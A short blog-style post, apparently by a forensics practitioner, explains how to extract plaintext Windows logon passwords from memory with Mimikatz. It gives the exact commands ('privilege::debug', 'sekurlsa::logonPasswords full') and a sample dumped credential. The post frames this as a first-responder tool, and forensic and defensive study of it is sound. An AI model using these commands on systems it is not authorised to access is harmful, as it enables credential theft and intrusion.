Generally the way to grab the password is to dump the LM/NT hashes either by grabbing the SAM or from a RAM dump and then use Rainbow tables (or a dictionary or brute force attack) to decrypt the plain text. This is not terribly hard but requires some knowledge and there is always the possibility of the crack not coming through for you.
Somehow I had missed the release of a tool called Mimikatz written by a chap with an extraordinary ability to undermine security holes within Microsoft (and has a penchant for writing everything in French, tres bien). If you would like to know how his technique works then please take the time our to read his cracking Powerpoint click here (Thankfully not in French!). Thanks to my friend Jon Evans who mentioned it to me last week.
Mimikatz can achieve a number of things but the most useful to me is its claim to extract plain text user passwords. Guess what - it works!
Here's what to do.
Download Mimikatz
Run the 32bit or 64bit version as administrator (please dont make me explain how you would know which!!) and you are presented with a console environment.
Next get into debug mode with the command:-
privilege::debug
Next simply dump the passwords by running:-
sekurlsa::logonPasswords full
Job done!
Username - nickfx
Password - 123
Easy eh!
This is an extremely useful addition to any first responder toolkit and I highly recommend having a go for 10 minutes.
